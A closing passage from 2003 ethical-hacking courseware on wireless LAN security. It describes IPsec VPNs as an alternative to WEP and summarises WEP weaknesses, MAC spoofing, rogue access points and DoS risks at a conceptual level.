
IPsec (Internet Protocol Security), as defined by the IETF, is the most widely used mechanism for securing VPN traffic. IPsec can use DES, 3DES and other bulk algorithms for encrypting data, keyed hash algorithms (HMAC with MD5 or SHA-1) for authenticating packets, and digital certificates for validating public keys. With this solution, the wireless APs are configured for open access with no WEP encryption, and the VPN handles security.

VPNs also support a variety of user authentication methods such as RADIUS, SecurID and digital certificates. These standards-based methods allow for easy integration into existing network infrastructures. Since VPN servers can be centrally managed, administrative overhead is low. And unlike WEP with MAC address filtering, VPN solutions scale to many users.

start sidebar
Summary
  • A wireless LAN enables a mobile user to connect to a local area network (LAN) through a wireless (radio) connection.

  • Wired Equivalent Privacy (WEP) is a security protocol, specified in the IEEE 802.11 standard, that is designed to provide a wireless local area network (WLAN) with a level of privacy comparable to what is usually expected of a wired LAN.

  • WEP is vulnerable because of relatively short IVs and keys that remain static.

  • Even if WEP is enabled, MAC addresses can be easily sniffed by an attacker because they are transmitted in the clear. Spoofing a MAC address is also easy.

  • If an attacker holds wireless equipment nearby a wireless network, he will be able to perform a spoofing attack by setting up an access point (rogue) near the target wireless network.

  • Wireless networks are extremely vulnerable to DoS attacks.

  • A variety of hacking and monitoring tools are available for the Wireless networks as well.

  • Securing wireless networks involves adopting a suitable strategy such as MAC address filtering, firewalling, or a combination of protocol-based measures.

end sidebar
 

[1] Source: Jim Geier; "802.11 WEP: Concepts and Vulnerability"

[2] Source: www.wildpackets.com

[3] Source: www.kismetwireless.net

[4] Source: http://documents.iss.net/whitepapers/wireless_LAN_security.pdf




Staff of EC-Council - Ethical Hacking Student Courseware. Certified Ethical Hacker - Exam 312-50 (EC-Council E-Business Certification Series)
Year: 2003